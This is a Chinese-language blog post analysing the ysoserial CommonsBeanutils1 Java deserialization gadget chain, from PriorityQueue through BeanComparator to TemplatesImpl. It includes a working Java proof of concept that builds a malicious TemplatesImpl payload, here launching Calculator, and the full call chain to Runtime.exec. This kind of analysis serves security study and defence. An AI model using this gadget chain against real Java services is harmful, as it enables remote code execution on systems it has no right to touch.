<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="wk" />
  <meta name="description" content="" />
  
  
  <title>
    
      CommonsBeanutils链分析 
      
      
      |
    
     wEik1&#39;blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/avatar4.png">
    <link rel="icon" href="/images/avatar4.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="wEik1'blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img no-lazy src="/images/avatar4.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">wEik1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">CommonsBeanutils链分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2021-01-18 12:55:11
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/JAVA%E5%AE%89%E5%85%A8/" title="JAVA安全">
                    <b>#</b> JAVA安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags" title="Tags"></i>
                
                <span class="span--tag">
                  <a href="/tags/JAVA%E5%AE%89%E5%85%A8/" title="JAVA安全">
                    <b>#</b> JAVA安全
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="反序列化">
                    <b>#</b> 反序列化
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/CommonsBeanutilsa/" title="CommonsBeanutilså">
                    <b>#</b> CommonsBeanutilså
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <p>先看 ysoserial 中 CommonsBeanutils1 这条链的代码</p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118140118311.png" alt="image-20210118140118311"></p>
<p>最后返回的是 <code>PriorityQueue&lt;Object&gt; queue</code> ,看一下 PriorityQueue 这个类的定义。</p>
<p>PriorityQueue类在Java1.5中引入并作为 <a target="_blank" rel="noopener" href="http://www.journaldev.com/1260/java-collections-framework-tutorial">Java Collections Framework</a> 的一部分。PriorityQueue是基于优先堆的一个无界队列，这个优先队列中的元素可以默认自然排序或者通过提供的<a target="_blank" rel="noopener" href="http://www.journaldev.com/780/java-comparable-and-comparator-example-to-sort-objects">Comparator</a>（比较器）在队列实例化的时排序。</p>
<p>简单来说就是 PriorityQueue 会对队列中的元素用比较器 Comparator 进行排序，而 CommonsBeanutils1 中使用的比较器为 BeanComparator。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">final BeanComparator comparator &#x3D; new BeanComparator(&quot;lowestSetBit&quot;);</span><br><span class="line">...</span><br><span class="line">Reflections.setFieldValue(comparator, &quot;property&quot;, &quot;outputProperties&quot;);</span><br></pre></td></tr></table></figure>
<p><strong><em>这里先放一放</em></strong>，我们看看  PriorityQueue 是如何反序列化的，</p>
<p>直接看 PriorityQueue#readObject() 方法的代码，前边就是将队列中的对象反序列化，最后会调用 PriorityQueue#heapify() 方法。</p>
<p><em>java.uti.PriorityQueue.java</em></p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118141333973.png" alt="image-20210118141333973"></p>
<p>跟进 PriorityQueue#heapify() 方法，这里应该就是排序的代码，遍历队列中的元素传入 PriorityQueue#siftDown() 方法</p>
<p><em>java.uti.PriorityQueue.java</em></p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118141725380.png" alt="image-20210118141725380"></p>
<p> PriorityQueue#siftDown()</p>
<p><em>java.uti.PriorityQueue.java</em></p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118142349991.png" alt="image-20210118142349991"></p>
<p> PriorityQueue#siftDownUsingComparator()</p>
<p><em>java.uti.PriorityQueue.java</em></p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118142445779.png" alt="image-20210118142445779"></p>
<p>一路跟到  PriorityQueue#siftDownUsingComparator() 方法，这里就调用了比较器  comparator 的 compare 方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PriorityQueue#readObject() -&gt; PriorityQueue#heapify() -&gt; PriorityQueue#siftDown() -&gt; PriorityQueue#siftDownUsingComparator() -&gt;  comparator.compare()</span><br></pre></td></tr></table></figure>
<p><strong><em>总结一下</em></strong>就是 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法即 comparator.compare() 去处理。</p>
<p>而之前说到 CommonsBeanutils1 链中使用的比较器为 BeanComparator。我们来看  BeanComparator 中的 compare() 方法。</p>
<p>BeanComparator#compare()</p>
<p><em>org.apache.commons.beanutils.BeanComparator.class</em></p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118143341316.png" alt="image-20210118143341316"></p>
<p>在 BeanComparator#compare() 中使用了 PropertyUtils.getProperty() 去处理传入的对象</p>
<p>PropertyUtils.getProperty() 是干嘛的？</p>
<p> 一般情况下，在<a target="_blank" rel="noopener" href="http://lib.csdn.net/base/17">Java</a>中你可以通过get方法轻松获取beans中的属性值。但是，当你事先不知道 <em>beans</em> 的类型或者将要访问或修改的属性名时，该怎么办？Java语言中提供了一些像<code>java.beans.Introspector</code>这 样类，实现了在运行时检测Java类并确定属性get和set方法的名称，结合Java中的反射机制就可以调用这些方法了。然而，这些APIs使用起来比 较困难，并且将Java类中一些不必要的底层结构暴露给了开发人员。BeanUtils包中的APIs试图简化动态获取和设置bean属性的过程。</p>
<p>而 getProperty() 的定义如下：</p>
<p><code>PropertyUtils.getProperty(Object bean, String name)</code><br><code>bean</code> 是不为null的Java Bean实例<br><code>name</code> 是Java Bean属性名称 (也就是方法中的getXxx(), setXxx(), 其中的xxx成为这个java bean的bean属性, java中的类成员变量称为字段, 并不是属性。<br>这个方法是调用bean对象中, 中的getname()方法</p>
<p>简单来说就是PropertyUtils.getProperty() 有两个参数 Object、String，比如传入 User() 和 “xxx”，PropertyUtils.getProperty(new User(),”xxx”)  就相当于调用了 User.getxxx() 方法。</p>
<p>在 BeanComparator#compare()  中 o1、o2 就是队列中的元素，this.property 也是可控的。这就相当于我们能够调用任意类中的 getter 方法即以 get 开头且没有参数的方法。</p>
<p><strong><em>到这我们总结一下</em></strong>，通过定义一个 PriorityQueue 队列，并且设置比较器为我们构造好的 BeanComparator 比较器，就可以执行队列中元素的任意 getter 方法。</p>
<p>所以我们只需要找到一个包含能触发危险敏感操作的 getter 方法的可序列化类即可，ysoserial 中 CommonsBeanutils1 使用的是  <strong>TemplatesImpl</strong> 类(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl)</p>
<p>TemplatesImpl 类可以加载自定义的字节码并实例化，从而可执行任意 Java 代码.并且它的入口函数为 TemplatesImpl#getOutputProperties() ，具体可以看 <a target="_blank" rel="noopener" href="https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/#%E5%88%A9%E7%94%A8-TemplatesImpl-%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81">https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/#%E5%88%A9%E7%94%A8-TemplatesImpl-%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81</a></p>
<p>写代码复现一下这个过程</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"><span class="keyword">import</span> java.math.BigInteger;</span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.BeanComparator;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Reflections;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonsBeanutils1</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="comment">// 直接用ysoserial 的 Gadgets.createTemplatesImpl创建一个恶意 templates 类</span></span><br><span class="line">        String args1 = <span class="string">&quot;/System/Applications/Calculator.app/Contents/MacOS/Calculator&quot;</span>;</span><br><span class="line">        <span class="keyword">final</span> Object templates = Gadgets.createTemplatesImpl(args1);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 实例化一个 BeanComparator 比较器</span></span><br><span class="line">        <span class="keyword">final</span> BeanComparator comparator = <span class="keyword">new</span> BeanComparator(<span class="string">&quot;lowestSetBit&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 设置BeanComparator 比较器的 property 属性为 outputProperties，因为最后需要执行 TemplatesImpl 的 getOutputProperties()方法</span></span><br><span class="line">        Reflections.setFieldValue(comparator, <span class="string">&quot;property&quot;</span>, <span class="string">&quot;outputProperties&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 实例化 PriorityQueue 队列，并且设置比较器为前边定义的 BeanComparator comparator</span></span><br><span class="line">        <span class="keyword">final</span> PriorityQueue&lt;Object&gt; queue = <span class="keyword">new</span> PriorityQueue&lt;Object&gt;(<span class="number">2</span>, comparator);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 将定义的恶意 TemplatesImpl 类对象添加到队列, 需要触发比较所以添加两个</span></span><br><span class="line">        queue.add(templates);</span><br><span class="line">        queue.add(templates);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>成功执行命令</p>
<p><img src="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118152705398.png" alt="image-20210118152705398"></p>
<p>前边说的 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法，所以效果也是一样的，反序列化时的调用链：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">PriorityQueue.readObject()</span><br><span class="line">	PriorityQueue.heapify()</span><br><span class="line">		PriorityQueue.siftDown()</span><br><span class="line">			siftDownUsingComparator()</span><br><span class="line">				BeanComparator.compare()</span><br><span class="line">					TemplatesImpl.getOutputProperties()</span><br><span class="line">						TemplatesImpl.newTransformer()</span><br><span class="line">							TemplatesImpl.getTransletInstance()</span><br><span class="line">								TemplatesImpl.defineTransletClasses()</span><br><span class="line">									TemplatesImpl.TransletClassLoader.defineClass()</span><br><span class="line">										Pwner*(Javassist-generated).&lt;static init&gt;</span><br><span class="line">											Runtime.exec()</span><br></pre></td></tr></table></figure>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/01/17/hello-world/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-01-18 12:55:11
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="Categories"></i>
                    
                    <span class="span--category">
                      <a href="/categories/JAVA%E5%AE%89%E5%85%A8/" title="JAVA安全">
                        <b>#</b> JAVA安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags" title="Tags"></i>
                    
                    <span class="span--tag">
                      <a href="/tags/JAVA%E5%AE%89%E5%85%A8/" title="JAVA安全">
                        <b>#</b> JAVA安全
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="反序列化">
                        <b>#</b> 反序列化
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/CommonsBeanutilsa/" title="CommonsBeanutilså">
                        <b>#</b> CommonsBeanutilså
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    

    
      <div class="comments-container">
        





      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Weik1">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="1252820849@qq.com">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" href="">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" href="">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
        <li>
          <a title="wechat" href="">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
        <li>
          <a title="weibo" href="">
            <i class="iconfont icon-weibo"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © Oranges 2020</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  <script>
            window.imageLazyLoadSetting = {
                isSPA: false,
                processImages: null,
            };
        </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(e.href.match(t)||e.href.match(r))&&(e.href=a.dataset.original)})});</script><script>!function(n){n.imageLazyLoadSetting.processImages=i;var e=n.imageLazyLoadSetting.isSPA,r=Array.prototype.slice.call(document.querySelectorAll("img[data-original]"));function i(){e&&(r=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")));for(var t,a=0;a<r.length;a++)0<=(t=(t=r[a]).getBoundingClientRect()).bottom&&0<=t.left&&t.top<=(n.innerHeight||document.documentElement.clientHeight)&&function(){var t,e,n,i,o=r[a];t=o,e=function(){r=r.filter(function(t){return o!==t})},n=new Image,i=t.getAttribute("data-original"),n.onload=function(){t.src=i,e&&e()},n.src=i}()}i(),n.addEventListener("scroll",function(){var t,e;t=i,e=n,clearTimeout(t.tId),t.tId=setTimeout(function(){t.call(e)},500)})}(this);</script></body>
</html>
